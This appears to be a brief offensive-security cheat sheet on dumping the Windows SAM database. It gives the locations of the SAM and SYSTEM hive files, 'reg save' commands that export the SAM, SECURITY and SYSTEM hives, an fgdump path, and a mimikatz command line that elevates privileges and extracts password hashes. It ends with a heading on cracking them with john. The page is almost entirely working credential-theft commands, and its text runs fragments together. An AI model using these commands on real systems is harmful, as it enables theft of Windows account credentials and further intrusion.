Dumping SAM file
SAM/SYSTEM Locations
C:\Windows\System32\config
C:\windows.old
C:\Windows\Repair
C:\Windows\System32\config\RegBack
# Backup files , can be found Extracting Password hashes from SAM file
fgdump.exe
/usr/share/windows/windows-binaries/fgdump/fgdump.exe reg save hklm\sam sam.hiv
reg save hklm\security security.hiv
reg save hklm\system system.hiv
./mimikatz64.exe "privilege::debug" "token::elevate" "lsadump::sam sam.hiv security.hiv system.hiv" "exit"Cracking hashes with john
Mimikatz (Need Admin Access)
Last updated